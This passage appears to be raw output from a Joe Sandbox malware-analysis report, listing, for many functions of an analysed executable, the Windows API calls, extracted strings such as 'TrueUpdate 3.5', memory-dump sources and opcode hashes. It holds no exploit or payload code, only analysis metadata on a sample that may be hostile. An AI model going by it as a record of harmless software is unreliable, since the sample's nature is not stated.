                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3332788312-0
                                                                                                                • Opcode ID: 2f039f0fc31fecbdcac67ecd7a94f3bbace289618eba1bc2681dcdd903cbdd7d
                                                                                                                • Instruction ID: dd2873b391f69817bde92f91f5f7798a798dc3d4c8ff5fde14c979dea33df2ed
                                                                                                                • Opcode Fuzzy Hash: 2f039f0fc31fecbdcac67ecd7a94f3bbace289618eba1bc2681dcdd903cbdd7d
                                                                                                                • Instruction Fuzzy Hash: F9414779900619EFCF50CF94D888AEEB7B5FF48340B1541AEE905A7211CB389E41CBA9
                                                                                                                Function 00418932 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 464COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00418937
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041BA62: __EH_prolog.LIBCMT ref: 0041BA67
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0041C471: __EH_prolog.LIBCMT ref: 0041C476
                                                                                                                  • Part of subcall function 0041C471: GetTempPathA.KERNEL32(00000104,?), ref: 0041C52F
                                                                                                                  • Part of subcall function 0041C471: GetTempFileNameA.KERNEL32(?,IRWIN,00000000,?), ref: 0041C549
                                                                                                                  • Part of subcall function 0041C471: SetFileAttributesA.KERNEL32(?,00000080), ref: 0041C55B
                                                                                                                  • Part of subcall function 0041C471: DeleteFileA.KERNEL32(?), ref: 0041C568
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                  • Part of subcall function 0041A33B: __EH_prolog.LIBCMT ref: 0041A340
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$FileInterlocked$IncrementTemp$AttributesDecrementDeleteNamePathlstrlen
                                                                                                                • String ID: 0:R$Content-Type: application/x-www-form-urlencoded$Incorrect HTTP status returned by server: %d$MSG_INITIALIZING$TrueUpdate 3.5
                                                                                                                • API String ID: 716760990-2677761981
                                                                                                                • Opcode ID: 2a05be3a193107ff33914d025b806101e9a4f7c69246c4ba78369640d6c6722e
                                                                                                                • Instruction ID: 7ad473c514a72808bbc6291213c6efbab76e7b9ada64fe613558528b0dac4d64
                                                                                                                • Opcode Fuzzy Hash: 2a05be3a193107ff33914d025b806101e9a4f7c69246c4ba78369640d6c6722e
                                                                                                                • Instruction Fuzzy Hash: E9125D75900249EFCF14EFA5C985EEEBBB9BF14304F00415EF506A3281DB78AA84CB65
                                                                                                                Function 004BC00B Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 241fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,?,00000000,00000000), ref: 004BC1BE
                                                                                                                • GetLastError.KERNEL32 ref: 004BC1CA
                                                                                                                • GetFileType.KERNEL32(00000000), ref: 004BC1DF
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004BC1EA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateErrorHandleLastType
                                                                                                                • String ID: @$H
                                                                                                                • API String ID: 1809617866-104103126
                                                                                                                • Opcode ID: 1500813310131fe4c6ee9c1ba9e423d11943816b0715029057323d9edd96e570
                                                                                                                • Instruction ID: f1bfe6cf48644e7f6ad8d24aaebeefab697faa0ad4a5076101811a8fddd81a35
                                                                                                                • Opcode Fuzzy Hash: 1500813310131fe4c6ee9c1ba9e423d11943816b0715029057323d9edd96e570
                                                                                                                • Instruction Fuzzy Hash: 22811831D0424596EF24AFA888C47EF7B609F01368F14425BE9617A3D2C7BC89458BBE
                                                                                                                Function 00430915 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 191libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0043091A
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiEnumPatchesA), ref: 00430968
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                  • Part of subcall function 004AF0B8: RtlFreeHeap.NTDLL(00000000,?,00000000,00000010,?,?,004AF278,00000009,?), ref: 004AF18C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen$AddressFreeHeapLibraryLoadProc
                                                                                                                • String ID: 0:R$MsiEnumPatchesA$PatchCode$TransformList
                                                                                                                • API String ID: 1053048375-1542265820
                                                                                                                • Opcode ID: cd6f0d8db1d8cce12e43ad3bbf7bb3a3b24f07ffa98d04c47fca6015fdb21ac9
                                                                                                                • Instruction ID: 36e6676ba8e9ab5c250fd7ea8ff446ebc7f351a2aa8b5b7f98af7c5f2420abf1
                                                                                                                • Opcode Fuzzy Hash: cd6f0d8db1d8cce12e43ad3bbf7bb3a3b24f07ffa98d04c47fca6015fdb21ac9
                                                                                                                • Instruction Fuzzy Hash: 8F619A75C00219AADB04FBE5DC92FEEBB78AF18318F24550EF412721C2DB7C5A458769
                                                                                                                Function 00424332 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 168COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00424358
                                                                                                                • __ftol.LIBCMT ref: 00424367
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                  • Part of subcall function 0045468E: SendMessageA.USER32(?,00000182,-00000001,00000000), ref: 004546DE
                                                                                                                  • Part of subcall function 0045468E: SendMessageA.USER32(?,00000181,-00000001,00000000), ref: 004546EF
                                                                                                                  • Part of subcall function 0045468E: SendMessageA.USER32(?,00000186,000000FF,00000000), ref: 0045472E
                                                                                                                  • Part of subcall function 0045468E: SendMessageA.USER32(?,0000019A,-00000001,00000000), ref: 00454762
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prolog__ftol
                                                                                                                • String ID: Checked$ItemData$Selected$Text
                                                                                                                • API String ID: 4274534877-779246079
                                                                                                                • Opcode ID: b3f4bc011db87e945d604592dfb29393742bbc81f413076ea15391b0bcc94f2b
                                                                                                                • Instruction ID: 0ddb7305cbaec2757157c644248406dd5e87f73e4c70d122857bba50fbedb303
                                                                                                                • Opcode Fuzzy Hash: b3f4bc011db87e945d604592dfb29393742bbc81f413076ea15391b0bcc94f2b
                                                                                                                • Instruction Fuzzy Hash: 7F41573160552479E7157726AC83FEF365DDF82368F20460FF911A51C2EF6C5A8243AE
                                                                                                                Function 0042839B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004283A0
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 00428425
                                                                                                                • ShellExecuteA.SHELL32(?,open,00000000,?,00000000,00000000), ref: 00428470
                                                                                                                • ShellExecuteA.SHELL32(?,00000000,00000000,?,00000000,00000000), ref: 004284C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$ExecuteShell$__ftollstrlen
                                                                                                                • String ID: $open
                                                                                                                • API String ID: 899862102-119239145
                                                                                                                • Opcode ID: 1ddbc1df1c3f2274b6a7e5647c1af4a7b3f83dc969544a2baf5c35a32cbeef07
                                                                                                                • Instruction ID: 84366092f8816621cbad6baf36ccbf8e68f38dc8e5aef6262cddb001f3d95030
                                                                                                                • Opcode Fuzzy Hash: 1ddbc1df1c3f2274b6a7e5647c1af4a7b3f83dc969544a2baf5c35a32cbeef07
                                                                                                                • Instruction Fuzzy Hash: 76419176905228AEDB14FBB5EC42EEF7B68EF05314F10412FF411B21C2EF385A858669
                                                                                                                Function 004303A7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 139libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004303AC
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiGetShortcutTargetA), ref: 004303F3
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen$AddressLibraryLoadProc
                                                                                                                • String ID: 0:R$ComponentCode$FeatureId$MsiGetShortcutTargetA
                                                                                                                • API String ID: 730962311-3930607590
                                                                                                                • Opcode ID: 87eef367d14b115e18cc56f594158bfe713cb9c4ef14f178e1523b7f86c30e96
                                                                                                                • Instruction ID: d4ef9a3571dd391edcb842ac1d30551f098ba135a01794bb31a5e61118261d8a
                                                                                                                • Opcode Fuzzy Hash: 87eef367d14b115e18cc56f594158bfe713cb9c4ef14f178e1523b7f86c30e96
                                                                                                                • Instruction Fuzzy Hash: 9A411235800215B6CB01F7A2CC52FFE7A289F52768F14421FF812721D2DF6C1B42C6AA
                                                                                                                Function 00444042 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Source was less than 4 characters, xrefs: 0044409F
                                                                                                                • Source ends with a slash, xrefs: 00444131
                                                                                                                • Source contains invalid character, xrefs: 00444182
                                                                                                                • Source was empty, xrefs: 0044407E
                                                                                                                • Source did not have drive specifier, xrefs: 004440F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Source contains invalid character$Source did not have drive specifier$Source ends with a slash$Source was empty$Source was less than 4 characters
                                                                                                                • API String ID: 3519838083-1937954483
                                                                                                                • Opcode ID: bf18c7de1cd839a580f0367d941139d82415c67f2c850bfc82b94c9128720514
                                                                                                                • Instruction ID: b3acbfe35c2314af9ce1d7c65955aa3747a71a84e8ae8f816319af8903ad8055
                                                                                                                • Opcode Fuzzy Hash: bf18c7de1cd839a580f0367d941139d82415c67f2c850bfc82b94c9128720514
                                                                                                                • Instruction Fuzzy Hash: E74107347403059FEB14EBA5C996FBE7BB0AF94704F10412FF102A72C1CBB85985875A
                                                                                                                Function 004441B5 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 127COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Destination did not have drive specifier, xrefs: 00444246
                                                                                                                • Destination was less than 2 characters, xrefs: 00444203
                                                                                                                • Destination contains invalid character, xrefs: 004442BC
                                                                                                                • Destination was empty, xrefs: 004441EE
                                                                                                                • Source includes wildcards but destination has a file name at the end, xrefs: 004442ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Destination contains invalid character$Destination did not have drive specifier$Destination was empty$Destination was less than 2 characters$Source includes wildcards but destination has a file name at the end
                                                                                                                • API String ID: 3519838083-2371027411
                                                                                                                • Opcode ID: 11ad46ddd213795edeabb213814f3fea095e49d02d1329c029afe43c78a322ae
                                                                                                                • Instruction ID: e728cf5abf40f8b6c25cba219de29e8f1bd5826e9a65f2d28502286fbbff087a
                                                                                                                • Opcode Fuzzy Hash: 11ad46ddd213795edeabb213814f3fea095e49d02d1329c029afe43c78a322ae
                                                                                                                • Instruction Fuzzy Hash: 4C410934B002409BDB14EF29C496FBE77A1AF85774F14831FF521972D1CBB95981824A
                                                                                                                Function 004241EC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 116COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00424210
                                                                                                                • __ftol.LIBCMT ref: 00424222
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __ftol$H_prolog
                                                                                                                • String ID: Checked$ItemData$Selected$Text
                                                                                                                • API String ID: 2516785518-779246079
                                                                                                                • Opcode ID: a35c3e90b4fe907689026ab3e3feba8a64bfb34938237e79568cab6737b08971
                                                                                                                • Instruction ID: 7dbbf9e458c36e5749a9129b95461df057a6c111d5b48fc50b55a5daca1ce7d6
                                                                                                                • Opcode Fuzzy Hash: a35c3e90b4fe907689026ab3e3feba8a64bfb34938237e79568cab6737b08971
                                                                                                                • Instruction Fuzzy Hash: 2231E671600210BAD7117BA78C82FBF366CDFC1B98F14440FF9056A192DB6D5D8267AE
                                                                                                                Function 004605C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(?), ref: 004605D9
                                                                                                                • GetNextDlgTabItem.USER32(?,?,?), ref: 00460601
                                                                                                                • GetNextDlgTabItem.USER32(00000000,00000000,?), ref: 00460671
                                                                                                                  • Part of subcall function 004C932E: GetDlgItem.USER32(?,?), ref: 004C933C
                                                                                                                • IsWindow.USER32(?), ref: 004606C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Item$NextWindow
                                                                                                                • String ID: !$tTQ
                                                                                                                • API String ID: 3345120248-2224091262
                                                                                                                • Opcode ID: 494654775a3f53cb91d98aefb662bad36c9c0441901bfd4f55049fd52177b9a4
                                                                                                                • Instruction ID: b77a0f2f3527bad80a4bab2de26ea082354b571cbcc979fd8a8c299e6b3a3192
                                                                                                                • Opcode Fuzzy Hash: 494654775a3f53cb91d98aefb662bad36c9c0441901bfd4f55049fd52177b9a4
                                                                                                                • Instruction Fuzzy Hash: 0631C1716042529FCB258F29C848A6FB7A9EFC4751F05022EE802DB2A1DB34CC11CB99
                                                                                                                Function 0045844D Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 0045846B
                                                                                                                • GetObjectA.GDI32(?,0000000C,?), ref: 00458482
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0045849D
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004584B8
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 004584BB
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004584D1
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 004584FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BrushColorCreateSolid$Object
                                                                                                                • String ID:
                                                                                                                • API String ID: 2949401836-0
                                                                                                                • Opcode ID: 62c2c0b5e8d092c46cb0eaaf2b58ccf12773ce50326d95b7c6a4c558317b4346
                                                                                                                • Instruction ID: 5fd8f3a04d7d7f6dbd2283b6caeb19ace0a1c8af8b2773bb235d4debcd9c45a8
                                                                                                                • Opcode Fuzzy Hash: 62c2c0b5e8d092c46cb0eaaf2b58ccf12773ce50326d95b7c6a4c558317b4346
